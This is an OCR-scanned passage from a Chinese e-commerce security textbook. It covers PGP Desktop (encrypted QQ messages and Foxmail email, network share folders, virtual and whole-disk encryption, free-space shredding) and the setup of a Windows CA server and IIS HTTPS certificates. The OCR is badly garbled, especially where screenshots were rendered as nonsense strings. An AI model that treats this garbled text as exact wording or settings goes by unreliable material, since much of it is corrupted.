送 敏感 机 密 数 据 的 一 种 较 好 选择 。 

(2) 解密 窗口 消息 

QQ 接收 到 的 消息 显示 在 上 部 分 的 消息 显示 框 中 ,该 显示 框 不 是 标准 的 输入 框 , 没 有 输 
入 焦点 ,PGP 软件 无 法 自动 获取 文本 内 容 , 为 此 ,可 从 “----- BEGIN PGP MESSAGE----- 4 
Fih, Æ“-----END PGP MESSAGE-----” 结 束 部 分 全 部 选中 并 复制 粘贴 到 记事 本 中 ,并 将 输 
入 焦点 停留 在 记录 本 中 ,然后 再 在 PGP 托盘 中 选择 "当前 窗口 下面 的 “解密 ë. 校 验 ” 选 项 。 

此 时 将 弹出 输入 口令 对 话 框 ,要 求 输入 接收 者 的 私 钥 保 护 口 邻 ,输入 口令 后 单 击 “ 确 定 ” 
按钮 , 即 可 完成 对 密 文 的 解密 和 对 签名 的 校 验 。 解 密 结果 如 图 6. 43 所 示 。 


<bookiPcadd.cq.cn> (Dx8SE6E92A) 
mesa: Aii P: DES 12 


(EDNERIFIED MESSAGE *** 


*** END PGP DECRYPTEDIVERIFIED MESSAGE *** 


P. 
[wawas U wes j 


图 6.43” 密 文 解密 结果 


4. 加 密 与 解密 邮件 
(1) 发 送 加 密 邮 件 
为 提高 邮件 通信 的 机 密 性 ,可 使 用 PGP 消息 来 对 邮件 通信 进行 加 密 或 解密 。 在 PGP 
主 界面 中 单 击 *PGP 消息 ”按钮 ,然后 单 击 “ 新 服务 ”按钮 ,为 要 收发 邮件 的 某 个 邮箱 创建 一 
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个 加 解密 的 消息 服务 ,如 图 6. 44 所 示 。 该 消息 服务 相当 于 一 个 邮件 加 解密 的 网 关 , 一 个 邮 
箱 地 址 需要 对 应 地 创建 一 个 这 样 的 服务 。 


is O ` senc) 
zansa 


E oorl 
meg 
nucu M 


TARA 默认 ) 


图 6.44 为 收发 邮件 的 某 个 邮箱 创建 加 解密 服务 


在 如 图 6. 44 所 示 的 新 服务 的 创建 界面 中 ,在 “描述 "输入 框 中 可 输入 对 该 消息 服务 的 描 
述 , 在 “邮件 地 址 ? 栏 中 输入 自己 使 用 的 邮箱 地 址 , 单 击 * 服 务 器 设置 "按钮 ,输入 收 信服 务 器 
地 址 和 发 信服 务 器 地 址 “Universal 服务 器 "保持 默认 值 * 二 无 二 ”, 在 “用 户 名 ”输入 框 中 输 
入 该 邮件 地 址 的 用 户 名 ,在 “默认 密 钥 ”下 拉 框 中 选择 该 邮件 地 址 对 应 的 密 钥 ,设置 完成 后 的 
界面 如 图 6. 45 所 示 。 


”服务 器 设置 (S) 
al.cqdd.cq.cn 
< 无 > 下 


| 


EARO). 


图 6.45 设置 邮件 消息 服务 
174 


第 6 章 电子 商务 的 安全 

对 book@cqdd. cq. cn 邮箱 地 址 创建 PGP 消息 服务 后 , 接 下 来 就 可 使 用 Foxmail 邮件 
收发 客户 端 软件 ,进行 邮件 的 加 密 发 送 测试 了 。 

在 Foxmail 软件 中 , 按 正常 方式 发 送 邮件 ,此 时 所 发 送 的 邮件 会 被 PGP 消息 服务 所 拦 
截 , 然 后 弹出 要 求 输入 发 送 者 私 钥 保 护 口令 的 对 话 框 , 输 入 口令 后 开始 邮件 的 加 密 发 送 ( 自 
动 对 邮件 正文 消息 和 附件 加 密 ) ,发 送 成 功 后 会 显示 如 图 6. 46 所 示 的 消息 提示 。 

(2) 解密 接收 到 的 加 密 邮 件 

加 密 邮 件 接收 方 要 能 正常 解密 邮件 ,也 必 U +m 加 ww 作坊 
须 安装 PGP 软件 ,并 配置 自己 邮箱 地 址 的 ws 
PGP 消息 服务 ,配置 好 后 ,接收 邮件 时 ,输入 自 
己 的 私 钥 保护 口令 后 ,会 自动 对 邮件 进行 解密 。 

若 用 户 没 有 安装 PGP 软件 或 没有 配置 
PGP 消息 服务 , 则 无 法 对 邮件 进行 解密 ,在 接收 下 来 的 邮件 中 ,邮件 密 文 (Message. pgp) 以 
邮件 附件 的 方式 呈现 。 

为 便于 测试 邮件 的 解密 ,此 处 在 同一 台 计 算 机 上 配置 邮件 接收 者 (answer@ cadd. ca. 
cn) 的 PGP 消息 服务 ,并 在 Foxmail 中 添加 配置 answer@cqdd. cq. cn 邮箱 。 

在 创建 好 一 个 PGP 消息 服务 后 ,PGP 消息 的 下 级 菜单 项 中 就 没有 “新 服务 ”选项 了 ,如 
图 6.45 所 示 。 此 时 可 在 *PGP 消息 ”上 右 击 ,在 弹出 的 快捷 菜单 中 提供 了 “新 建 服务 ” 功 
能 项 。 

创建 好 另 一 个 邮箱 的 PGP 消息 服务 后 ,就 可 在 Foxmail 软件 中 接收 该 邮箱 中 的 加 密 邮 
件 了 。 首 次 接收 邮件 时 ,会 弹出 如 图 6.47 所 示 的 对 话 框 。 

在 如 图 6.47 所 示 的 对 话 框 中 单 击 “ 总 是 允许 此 站 点 ”按钮 ,信任 来 自 该 邮件 服务 器 的 邮 
件 。 之 后 就 会 开始 邮件 的 接收 ,然后 弹出 如 图 6.48 所 示 的 对 话 框 ,要 求 输 入 解密 口 今 。 


图 6.46 加 密 邮 件 发 送 成 功 提示 


xil Emi z 
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图 6.47 选择 是 否 信 任 该 邮件 服务 器 图 6.48 输入 邮件 接收 者 的 私 钥 保 护 口令 


解密 成 功 后 , 收 到 的 邮件 以 解密 后 的 明文 方式 显示 ,如 图 6. 49 所 示 。 

通过 PGP 消息 服务 ,邮件 发 送 和 接收 实现 了 自动 加 密 和 解密 。 对 于 邮件 收发 软件 
Foxmail 而 言 ,不 需要 做 任何 设置 上 的 改变 。 这 种 加 密 传输 方式 有 效 地 保证 了 邮件 通信 的 
传输 安全 。 

5. PGP 阅读 器 

PGP 阅读 器 用 于 解密 和 阅读 PGP 加 密 的 邮件 ,提供 了 解密 PGP 邮件 消息 和 附件 功能 ， 
并 可 将 解密 后 的 邮件 复制 到 收 件 箱 中 .其 功能 界面 如 图 6. 50 所 示 。 
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图 6.50 PGP 阅读 器 


若 用 户 采 用 Webmail 来 接收 加 密 邮件 ,此 时 就 需要 借助 于 PGP 阅读 器 来 解密 和 阅读 
加 密 邮 件 。 

6. PGP 网 络 共享 

PGP 共享 实现 加 密 一 个 或 多 个 文件 夹 ,以 实现 与 其 他 PGP Desktop 用 户 在 网 络 环境 中 
文件 的 安全 共享 。PGP 网 络 共享 的 功能 界面 如 图 6. 51 所 示 。 

值得 注意 的 是 ,PGP 网 络 共享 仅 是 对 共享 的 文件 夹 中 的 文件 进行 加 密 , 要 使 网 络 中 的 
其 他 用 户 能 访问 到 该 共享 文件 夹 中 的 文件 ,需要 借助 Windows 系统 的 文件 夹 网 络 共享 功能 
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单 击 “ 添 加 文件 夹 ” 按 钮 ,将 打开 “PGP 网 络 共享 助手 ”界面 ,如 图 6. 52 所 示 。 


Ë PGP Desktop - MA XHK 
文件 全 


拖 放 文件 夹 到 此 处 


文件 夹 状态 
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图 6.51 PGP 网 络 共享 
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图 6.52 PGP 网 络 共享 助手 
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a 


击 “ 浏 览 ”按钮 ,选择 要 加 密 共享 的 文件 夹 ,然后 单 击 “ 下 一 步 ” 按 钮 ,添加 
访问 该 共享 文件 夹 的 用 户 , 如 图 6. 53 所 示 。 


EE 


添加 用 户 


您 输入 到 如 下 列表 中 的 每 个 用 户 将 有 对 这 个 文件 到 的 同等 访问 权 ， 并 且 能 
够 增加 ,删除 其 她 用户, 并 且 和 解密 这 个 文件 卖 。 


名 称 


Ee] 
— | 
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图 6.53 添加 允许 访问 共享 文件 夹 的 用 户 


在 如 图 6.53 所 示 的 对 话 框 中 , 单 击 “ 添 加 ”按钮 ,可 从 当前 密 钥 环 中 选择 添 
共享 文件 夹 的 用 户 , 然 后 单 击 “ 下 一 步 ” 按 钮 ,此 时 将 显示 “选择 签名 人 ”界面 
所 示 。 
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图 6. 54 ”选择 共享 文件 夹 的 签名 人 


选择 好 签名 用 户 后 ,输入 签名 用 户 的 私 钥 保护 口令 ,单车 


指定 的 共享 文件 夹 中 的 数据 进行 加 密 保护 ,加密 完 成 后 , 单 击 “ 完 成 "按钮 。 
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加 允许 访问 
,如 图 6. 54 


击 “ 下 一 步 ”按钮 ,PGP 便 开始 对 
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加 密 完 成 后 的 网 络 共享 文件 夹 在 操作 系统 中 打开 时 可 见 每 个 文件 的 图 标 都 增加 了 一 个 
带 锁 的 图 标 , 示 意 该 文件 已 被 加 密 , 如 图 6. 55 所 示 。 从 图 6. 55 中 可 见 ,文件 的 扩展 名 并 未 
改变 ,但 打开 文件 内 容 , 可 以 发 现 已 被 加 密 。 


D - 1 = D| x] 
文件 日 编辑) SEV BAW IAD HIW Li 
ORE- O-T|PRR OXER | + > X190 
地 址 (0) [O osecureNetshare >] EJ =a! 
-次 PGPF5.INI 4KB 配置 设置 2010-11-169:50 SA 
@Jmwma O OOOO 3,997KB MHTML 文档 2010-11-169:50 A 

申报 国家 骨干 高 职 院 校 紧急 任务 人 员 .doc SOKB Microsoft Word 文 档 。 2010-11-169;50 A 

计算 机 网 络 基础 试卷 模板 .rar 54KB WinRAR 压缩 文件 2010-11-169;50 A 


图 6.55 加密 后 的 共享 文件 夹 


若 向 共享 文件 夹 中 新 添加 了 文件 ,可 选择 * 重 加 密 文件 夹 ?功能 项 ,如 图 6. 56 所 示 。 


文件 夹 状 态 


liJ 刷新 状 志 以 宰 到 最 新 僵 息 E RRG 


PGP 网 络 共享 
居所 有 文件 到 用 户 访问 


wr 


名 称 ° wame(a) 
全 cqanper <booklƏcqdd.cq n> 
“V, smartboy <answer@cqdd.cq.cn> -= Wm 


RSS 2010-11-16 10:16:34 被 cqsniper <book@codd.cq.cn> 


图 6. 56 对 共享 文件 夹 的 管理 功能 


对 于 非 正版 用 户 ,PGP 网 络 共享 文件 夹 功 能 异常 ,建议 不 要 使 用 该 项 功能 。 

利用 PGP 网 络 共享 下 面 的 “ 移 除 文 件 夹 ” 功 能 项 ,可 对 已 加 密 的 PGP 网 络 共享 文件 夹 
进行 解密 还 原 。 在 如 图 6. 56 所 示 的 界面 中 ,首先 选中 要 解密 还 原 的 网 络 共享 文件 夹 , 然 后 
单 击 “ 移 除 文件 夹 ”按钮 ,此 时 将 打开 如 图 6. 57 所 示 的 对 话 框 。 
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Jisan ns => 


确认 解密 
确认 下 列 要 解密 的 项 目 : 


DilSecureNetShare 


Attu 


Sm] ww | ww | 


图 6.57 解密 PGP 网 络 共 享 文件 夹 


单 击 “ 下 一 步 "按钮 ,此 时 将 打开 如 图 6. 58 所 示 的 对 话 框 ,要 求 输入 解密 者 的 私 钥 保护 
口令 ,输入 后 单 击 “ 确 定 " 按 钮 开始 解密 还 原 ,解密 完成 后 ,文件 夹 去 除 加 密 保护 ,文件 夹 中 的 


文件 内 容 被 解密 还 原 。 


pce maata 


从 中 可 见 ,在 PGP 
自然 地 被 解密 还 原 。 利 


7. PGP 磁盘 


NiS [D:\SecureNetShare] (30) 


进度 
FERETERAR. 


[asniper Geolacadd cq cnò @SA/2046) 
[enarthoy <answerdcadd. cq en> (RSA/2048) 


o] mo | fae 


ceo | m] 


图 6.58 输入 解密 者 的 私 钥 保护 口令 


网 络 共享 中 移 除 文件 夹 就 可 取消 对 文件 夹 的 加 密 保护 ,文件 夹 也 就 
这 种 方式 ,也 可 用 做 对 本 地 文件 的 加 密 保存 ,以 增强 安全 性 。 


PGP 磁盘 提供 了 新 建 虚拟 磁盘 、 加 密 全 盘 或 分 区 和 粉碎 可 用 空间 三 方面 的 功能 ,如 图 6. 59 


所 示 。 
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Š> Pop ae 


PERNES 


黎 可 以 自 娃 任意 数量 的 虚拟 磁 会 ， 每 次 加 富 还 可 | 
网 E aa 


PR AREZER OTADI n N yUPEri4 
pes SS ys a 592802 185 E 
z. 全 的 格 以 前 山 际 过 的 所 有 文件 和 


图 6.59 PGP 磁盘 功能 项 


(1) 新 建 虚拟 磁盘 
虚拟 磁盘 以 一 个 PGP 加 密 的 映像 文件 (. pgd) 的 形式 存在 ,加 载 后 产生 一 个 虚拟 的 磁 
盘 。 单 击 “ 新 建 虚拟 磁盘 ”按钮 ,将 显示 虚拟 磁盘 的 创建 界面 ,如 图 6. 60 所 示 。 


B PGP Desktop - 新 建 虚拟 磁盘 


文件 (F) E) EEV) 
* ; 
w eenas 


输入 磁盘 属性 
za 
warmen -| 
ser CN 


We N 局 动 时 转载 
g Wein 了 imaTazmnwe TEN 分 
su EE CN S| 
| 
me [TGK z 
用 户 访问 
为 一 个 密 钥 输入 用 


mmmn 


z W2OsAP 


= 更 改口 令 


图 6.60 ”新建 虚拟 磁盘 
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在 如 图 6. 60 所 示 的 创建 界面 中 ,在 “名 称 ” 输 入 框 中 输入 虚拟 磁盘 的 映像 文件 名 ,其 扩 
展 名 为 . pgd ,如 输入 *MySecureDisk. pgd”。 单 击 “ 浏 览 ” 按 钮 ,可 选择 映像 文件 存放 的 磁盘 
文件 来。 虚拟 磁盘 的 容量 可 选择 固定 大 小 ,也 可 选择 动态 扩展 。 若 选择 动态 扩展 方式 ,可 设 
置 指定 最 大 容量 值 。 虚 拟 磁盘 的 文件 系统 格式 可 选择 FAT, FAT 32 R NTFS 格式。 加 密 
方式 默认 为 AES(256 位 ) 密 钥 加 密 。 

“用 户 访问 ?设置 栏 用 于 设置 指定 哪些 用 户 可 以 访问 虚拟 磁盘 中 的 加 密 内 容 , 即 可 以 解 
密 访问 虚拟 磁盘 中 的 数据 。 各 项 设置 好 后 , 单 击 “ 创 建 "按钮 ,此 时 将 弹出 *PGP 为 密 钥 输 入 
口令 "对话 框 ,要 求 输入 允许 访问 的 用 户 的 私 钥 保护 口令 ,输入 口令 后 , 单 击 * 确 定 " 按 钮 ,之 
后 将 开始 新 建 和 格式 化 虚拟 磁盘 ,如 图 6. 61 所 示 。 


Bw vsecureoisk pod 


图 6.61 新 建 和 格式 化 虚拟 磁盘 


虚拟 磁盘 新 建 好 后 ,会 自动 挂 载 该 虚拟 磁盘 ,此 时 打开 Windows 系统 的 “我 的 电脑 ” 窗 
口 ,就 可 看 到 新 创建 产生 出 的 虚拟 磁盘 (CH:) 了 ,磁盘 的 卷 标 为 MySecureDis, 如 图 6. 62 
虚拟 磁盘 创建 并 加 载 成 功 后 ,该 磁盘 就 可 当做 一 个 正常 的 磁盘 来 使 用 了 。 为 测试 新 生 
成 的 虚拟 磁盘 ,在 该 磁盘 中 分 别 创建 一 个 名 为 mydoc 和 myphoto 的 文件 夹 ,然后 复制 一 个 
文件 到 H; 盘 的 根 目录 ,操作 结果 如 图 6. 63 所 示 。 从 使 用 效果 来 看 ,与 正常 的 磁盘 完全 相 
同 , 存 储 在 虚拟 磁盘 中 的 文件 以 未 加 密 的 方式 呈现 ,在 操作 系统 中 可 以 正常 打开 。 

虚拟 磁盘 务 载 后 是 以 加 密 的 映像 文件 的 形式 呈现 的 ,此 时 不 能 访问 虚拟 磁盘 中 的 任何 
内 容 。 
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XPD RSO ZEV BED IAD EID 
QAR- O- J| RR OXER | > > X @ | m 


XEO WKO FEV KEA IAD PWD 
QAB- O. J| RR OXR | > > X19] m 
地 址 (D) [= H: FIS EE] 


Dmydoc FT: 2010-11-16 16:48 
2010-11-16 16:49 


文件 宾 
21KB Microsoft Word 文 档 。 2010 十 139;36 


图 6.63 虚拟 磁盘 的 文件 操作 


若 要 印 载 虚拟 磁盘 ,可 打开 ”我 的 电脑 窗口 ,在 虚拟 磁盘 的 图 标 上 右 击 ,在 弹出 的 快捷 
菜单 中 选择 PGP Desktop 一 " 仓 载 磁盘 ?菜单 项 , 即 可 实现 对 虚拟 磁盘 的 外 载 。 

(2) 加 密 全 盘 或 分 区 

加 密 全 盘 通 过 对 整个 物理 磁盘 进行 加 密 , 以 提供 最 大 限度 的 安全 保证 。 该 种 加 密 方式 
加 密 磁盘 中 的 一 切 内 容 , 包 括 操作 系统 ,即使 将 硬盘 取 下 来 安装 到 其 他 计算 机 上 ,也 无 法 获 
得 加 密 硬盘 中 的 数据 。 除 了 对 整个 磁盘 进行 加 密 之 外 ,也 可 选择 对 某 一 个 分 区 进行 加 密 。 

在 如 图 6. 59 所 示 的 界面 中 , 单 击 “ 加 密 全 盘 或 分 区 ”按钮 ,此 时 将 显示 如 图 6. 64 所 示 的 
功能 界面 。 如 果 是 对 整个 物理 磁盘 进行 加 密 , 则 选中 整个 磁盘 ,不 要 选择 某 个 分 区 ; 若是 对 
某 个 分 区 加 密 , 则 选中 该 分 区 ,如 图 6. 64 所 示 的 界面 中 选择 的 是 D 分 区 。 

在 对 磁盘 或 分 区 进行 加 密 处 理 的 过 程 中 ,要 注意 保证 计算 机 的 供电 ,不 能 断 电 。 若 无 法 
保证 供电 ,建议 勾 选 “停电 保险 "选项 ,由 于 要 对 数据 进行 防 停电 备份 ,会 增加 加 密 所 需 的 时 
间 。 也 建议 勾 选 “ 最 大 CPU 使 用 ”选项 ,这 样 可 缩短 加 密 的 时 间 ,减少 因 停 电 可 能 所 带 来 的 
风险 。 

单 击 “ 新 建 口 令 用 户 ” 按 钮 ,打开 “PGP 磁盘 助手 "界面 ,如 图 6. 65 所 示 ,为 全 盘 或 分 
加 密 创建 新 用 户 , 用 于 对 磁盘 或 分 区 数据 进行 加 密 和 签名 。 

若 加 密 的 磁盘 或 分 区 包含 系统 启动 盘 , 则 必须 选中 “使 用 Windows 口令 ” 单 选 按钮 ,以 
使 PGP 口令 和 计算 机 账户 登录 同步 。 单 击 “ 下 一 步 ”按钮 继续 ,此 时 将 打开 如 图 6. 66 所 示 
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Jisan ns = 


选择 磁盘 或 分 区 来 加 密 加 密 选 项 


C( 引 导 } D: 189.9 GB HEER N 录 大 CPV 使 用 
B G ATA Bus: Maxtor 6Y200P0 002: 082e1i3) 


C 分 区 
SD 44% le 


D: mydata MEREEN) 
ka BAG 


点 击 ' 新 建 口 令 用 户 ' 来 添加 用 户 


图 6.64 加 密 全 盘 或 分 区 功能 界面 


全 盘 加 密 - 新 用 户 


e E 


下 - 步 > 取消 Eh 
图 6.65 为 磁盘 加 密 创建 新 用 户 


的 对 话 框 。 

从 如 图 6.66 可 见 , 只 有 “继续 只 用 口令 认证 "选项 有 效 . 单 击 “ 下 一 步 " 按 钮 ,此 时 将 打开 
如 图 6.67 所 示 的 对 话 框 ,要 求 输入 操作 系统 管理 员 账 户 的 口令 。 

输入 管理 员 账 户 的 口令 时 ,一定 要 和 系统 真实 管理 员 账 户 的 密码 相同 ,不 是 设置 新 的 密 
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双 因 素 认证 


C RERROSWE 


mr xi 


双 因 来 认证 除了 庄 加 妖 的 PP 口令 外 , FESM5 -RERE p: 
i 


下 列 选 项 中 罗列 了 一 些 


《返回 | 下 - 步 >| _ wa Wb 


图 6.66 “ 双 因 素 认 证 "对 话 框 


用 户 名 : 
cadnin 


Windows 帐 号 登录 
确认 您 的 用 己 名 和 域名 且 在 下 面 输入 了 您 的 口令 


加 和 


ndows 并 且 修 随意 卫 置 ， be Ti 
信息 ， 它 会 在 PGP Desktop 中 目 动 更 新 。 


< EE] T— > 取消 帮助 


图 6.67 输入 系统 登录 的 管理 员 账 户 的 密码 


码 。 输 入 口令 后 , 单 击 “ 下 一 步 ”按钮 , 即 可 实现 对 系统 登录 用 户 的 创建 .在 提示 创建 完成 的 


对 话 框 中 单 击 “ 完 成 ”按钮 


结束 PGP 磁盘 助手 向 导 。 


最 后 单 击 右 上 角 的 “加 密 ” 按 钮 . 即 可 开始 对 磁盘 或 分 区 进行 加 密 操 作 。 
在 对 该 项 功能 进行 测试 验证 时 ,建议 在 VMware 虚拟 机 中 安装 操作 系统 和 PGP 软件 
来 进行 全 盘 加 密 测试 ,以 防止 操作 失误 .将 磁盘 或 分 区 中 的 数据 损坏 。 


(3) 粉碎 可 用 空间 
PGP 粉碎 器 用 于 将 磁盘 上 可 
止 数据 被 恢复 。 


空间 中 仍 保留 的 数据 进行 安全 、 彻 底 的 永久 粉碎 ,以 防 
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平时 进行 的 文件 删除 操作 , 仅 是 在 文件 分 配 表 中 将 其 清除 ,在 文件 数据 存放 的 具体 扇 区 
中 ,仍然 保存 有 被 删 文 件 的 数据 内 容 。 对 于 敏感 重要 的 数据 ,采用 常规 的 删除 方法 是 极 不 安 
全 的 。 对 于 曾经 删除 过 的 文件 ,为 保险 起 见 , 可 使 用 PGP 提供 的 安全 粉碎 功能 来 实现 。 

若 要 对 正 要 删除 的 文件 进行 安全 粉碎 ,可 使 用 PGP 提供 的 文件 粉碎 功能 来 实现 。 在 要 
删除 的 文件 上 碳 击 ,在 弹出 的 快捷 菜单 中 选择 PGP Desktop 菜单 项 ,下 面 就 提供 了 对 文件 
的 粉碎 功能 。 


6.4 安全 Web 服务 器 的 配置 与 实现 


6.4.1 安全 Web 服务 器 简介 


采用 http:// 协 议 访问 网 页 时 ,网 页 的 数据 传输 全 部 采用 明文 非 加 密 传输 ,攻击 者 可 拦 
截获 取 到 网 页 传输 的 全 部 数据 ,没有 任何 安全 性 可 言 。 

为 保障 基于 网 页 应 用 的 安全 ,诞生 了 https:// 协 议 (Secure Hypertext Transfer 
Protocol) , 它 相 当 于 http :// 协 议 十 SSL( 安 全 套 接 字 层 ) 协 议 。 使 用 https:// 协 议 传输 的 网 
页 内 容 , 在 传输 过 程 中 使 用 SSL 协议 对 其 进行 加 密 传 输 , 从 而 有 效 地 保证 了 网 页 应 用 的 传 
输 安 全 。 

在 电子 商务 应 用 中 ,凡是 要 提交 用 户 账户 和 密码 ,银行 账号 和 密码 以 及 其 他 一 些 敏 感 数 
据 的 网 页 所 在 的 站 点 ,都 应 安装 配置 服务 器 证 书 , 采 用 https:/ /协议 来 访问 ,以 保证 数据 传 
输 的 安全 。 

要 使 IIS 的 Web 服务 器 支持 使 用 https:// 协 议 对 网 站 进行 访问 ,在 Web 服务 器 上 必须 
安装 配置 服务 器 证 书 ,并 配置 IIS, 启 用 “要 求 安 全 通道 (SSL)” 功 能 选项 。 


6.4.2 安装 配置 CA 证 书 服务 器 


安装 CA 证 书 服务 器 ,实质 就 是 构建 CA 认证 中 心 。 对 证 书 的 申请 、 颁 发 .撤销 等 维护 
和 管理 工作 , 均 由 CA 证 书 服务 器 来 完成 。 

证 书 服务 需要 启用 IIS 的 ASP 功能 ,在 安装 配置 CA 证 书 服务 器 之 前 ,在 IIS 的 "Web 
服务 扩展 ”中 ,注意 设置 "Active Server Pages” 的 状态 为 允许 ,如 图 6.68 所 示 。 

在 Windows 控制 面板 中 选择 执行 “添加 或 删除 程序 ”, 然 后 单 击 “ 添 加 /删除 Windows 
组 件 " 按 钮 ,打开 Windows 组 件 安装 向 导 , 如 图 6. 69 所 示 。 

在 "组件 ”列表 框 中 色 选 “证 书 服务 "选项 ,此 时 将 弹出 提示 框 ,提示 安装 证 书 服务 器 后 ， 
计算 机 名 和 域 成 员 身份 都 不 能 更 改 , 更 改 后 .将 使 此 CA 颁发 的 证 书 无 效 。 首 先 确 认 服 务 器 
的 计算 机 名 是 否 还 需 更 改 , 若 不 需要 , 单 击 " 是 ”按钮 确认 安装 证 书 服务 。 

在 如 图 6. 69 所 示 的 对 话 框 中 , 单 击 “ 下 一 步 按 钮 .此 时 将 打开 “CA 类 型 "对 话 框 ,如 
图 6.70 所 示 。 

选择 “独立 根 CA” 类 型 ,然后 单 击 “ 下 一 步 ” 按 钮 ,此 时 将 打开 如 图 6.71 所 示 的 对 话 框 ， 
要 求 输入 CA 识别 信息 。 在 “此 CA 的 公用 名 称 ” 输 入 框 中 输入 CA 的 名 称 ,“ 可 分 辨 名 称 后 
组 "保持 为 空 ,证 书 的 有 效 期 可 根据 需要 进行 设置 和 调整 ,默认 为 5 年 ,然后 单 击 “ 下 一 步 " 按 
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图 6.68 配置 允许 ASP 解析 


Windows MPA S 


Windows 组 件 
可 以 添加 或 入 BYindovs GHP. 


—w | | 


图 6.69 安装 证 书 服务 


Windows MPA S xl 


CA 类 型 
选择 您 想 设置 的 CA 类 型 . 


i Chs 需要 Active Directory, 您 必须 同时 是 企业 管理 员 组 的 成 


厂 用 自 定义 设置 生成 密 铀 对 和 CA EBW 


| 


图 6.70 选择 CA 类 型 
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钮 ,在 弹出 的 提示 框 中 单 击 * 是 "按钮 确认 ,此 时 将 开始 加 密 密 钥 ,之 后 显示 * 证 书 数 据 库 设 
置 ?界面 ,如 图 6.72 所 示 。 


Windows HPPA S 
Ca 


识别 信息 
输入 识别 该 CA 的 信息 。 


此 CA 的 公用 名 称 C) ` 


Eur 


FIS Q ` 


H 截止 日 期: 
F f =] 2015-11-18 16:34 


<s [EZ] Ww | m | 


图 6.71 设置 CA 识别 信息 


l| 
证 书 数据 库 设置 = 

和 输入 证 书 数 据 库 、 数 据 库 日 志和 配置 信息 的 位 置 ° 
证 书 数 据 库仑) 
[EEC iD 
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| ARW... 
a g rtrt mt (g) 

REXHR W: 

F \CAConfi g WEW.. 


F 保留 现 有 的 证 书 数 略 库 下) 
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图 6.72 设置 证 书 数据 库 


“证 书 数据 库 设置 ? 界 面 均 采用 默认 设置 值 , 这 样 系统 才 会 根据 证 书 类 型 自动 分 类 和 调 
用 ,因此 建议 用 户 不 要 修改 ,直接 单 击 * 下 一 步 ? 按 钮 ,此 时 将 弹出 * 要 完成 安装 ,证 书 服务 器 
必须 暂时 停止 Internet 信息 服务 。 您 要 现在 停止 服务 吗 ?” 的 提示 信息 ,回答 “是 ”, 系 统 开始 
安装 和 复制 文件 ,此 时 需要 将 Windows 2003 Server 的 安装 光盘 放 入 光驱 ,以 便 读 取 安 装 所 
需 的 系统 文件 。 

安装 完成 后 ,在 “开始 "菜单 的 “管理 工具 ”选项 下 面 将 新 增 “ 证 书 颁发 机 构 ” 菜 单项 ,并 在 
IIS 的 默认 站 点 下 面 自动 创建 CertControl、CertEnroll 和 CertSrv3 个 虚拟 目录 ,如 图 6.73 
所 示 。 
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Ü Internet 信息 服务 (II5) 管 理 器 
GAD BEO SEV SOW 帮助 只 | =la x 
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T CertEnrol CAWINDOWS}system324CertSrv\CertEnroll 
CAWINDOWS}system32\CertSrv 


图 6.73 证 书 服务 创建 的 虚拟 目录 


6.4.3 Web 服务 器 证 书 的 申请 与 安装 


1. 申请 Web 服务 器 证 书 
为 使 HS 支持 SSL 安全 协议 ,启用 安全 通道 ,IIS 服务 器 端 必须 申请 和 安装 服务 器 证 书 。 
在 “默认 网 站 ”上 右 击 ,在 弹出 的 菜单 中 选择 “属性 ”选项 打开 “默认 网 站 属性 "对话 框 ， 
选择 “目录 安全 性 ”选项 卡 , 如 图 6. 74 所 示 , 在 该 选项 卡 中 单 击 “ 服 务 器 证 书 ” 按 钮 ,打开 
Web 服务 器 证 书 向 导 。 
本 对 


Pism s T | Isir me L == 


| xs 
mrk | BÆ% | ASP.NET 


ae | m |_ =w |_ a 


图 6.74 Web 服务 器 目录 安全 性 设置 界面 


在 打开 的 服务 器 证 书 向 导 的 欢迎 页 面 中 , 单 击 “ 下 一 步 "按钮 ,此 时 将 打开 如 图 6. 75 所 
示 的 对 话 框 ,选中 “新 建 证 书 " 单 选 按钮 ,然后 单 击 “ 下 一 步 按 钮 ,将 打开 如 图 6. 76 所 示 的 对 
话 框 。 

在 如 图 6.76 所 示 的 对 话 框 中 ,直接 单 击 “ 下 一 步 ?按钮 。 此 时 将 要 求 设置 证 书 的 名 称 ， 
如 图 6.77 所 示 。 设 置 好 后 , 单 击 “ 下 一 步 ?按钮 , 接 下 来 将 打开 如 图 6. 78 所 示 的 对 话 框 ,要 
求 设 置 单位 和 部 门 的 名 称 。 
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图 6.75 IIS 证 书 向 导 


图 6.76 准备 证 书 请 求 


图 6.77 设置 证 书 的 名 称 
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在 如 图 6.78 所 示 的 界面 中 , 单 击 “ 下 一 步 按 钮 ,此 时 将 打开 如 图 6. 79 所 示 的 对 话 框 ， 
要 求 设置 站 点 的 公用 名 称 , 即 设置 要 使 用 SSL 协议 的 网 站 的 域名 ,此 处 假设 网 站 域名 为 
www. myweb, com。 网 站 域名 更 改 后 ,服务 器 证 书 将 失效 ,必须 重新 申请 。 


z 
单 


位 信息 
证 书 必须 包 合 您 单位 的 相关 信息 ， 以 便 与 其 他 单位 的 证 书 区 分 开 。 


和 违 择 或 输入 您 的 单位 和 部 门 名 称 。 通 常 是 指 您 的 合法 单位 名 称 及 部 门 名 称 。 


加 需 详 组 信息 ,请 参阅 下 书 堪 发 机 构 的 网 站 。 


= 


图 6.78 设置 证 书 拥有 者 的 单位 和 部 门 名 称 


到 
站 点 公用 名 称 
站 点 公用 名 称 是 其 完全 合格 的 域名 。 


BP aaa Er E BRA wama g: PPR 各 加 是 


加 果 公用 名 称 发 生变 化 ， 则 需要 获取 新 证 书 。 
公用 名 称 C): 


em 


《上 一 步 四 [下 - 步 四 >J _ ma 


图 6.79 设置 指定 启用 证 书 的 站 点 的 域名 


设置 指定 网 站 的 公用 名 称 (域名 ) 后 , 单 击 * 下 一 步 ? 按 钮 , 接 下 来 将 显示 要 求 输 入 地 理 信 
息 的 对 话 框 ,如 图 6. 80 所 示 。 

输入 “省 /自治 区 ”和 * 市 县 ”信息 后 , 单 击 * 下 一 步 "按钮 , 接 下 来 要 求 指定 一 个 文件 名 ,用 
来 保存 证 书 申请 请 求 ,如 图 6.81 所 示 。 

设置 好 后 , 单 击 *“ 下 一 步 ? 按 钮 , 接 下 来 将 显示 设置 信息 的 摘要 ,确认 无 误 后 , 单 击 “ 下 一 
步 ” 按 钮 ,最 后 显示 完成 对 话 框 , 单 击 “ 完 成 ”按钮 .完成 证 书 申请 请 求 。 

2. 颁发 与 导出 服务 器 证 书 

将 获得 的 证 书 请 求 文件 以 电子 邮件 或 其 他 方式 发 送 到 证 书 颁 发 机 构 , 证 书 颁发 机 构 将 
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图 6.81 设置 保存 证 书 申请 请 求 的 文件 名 


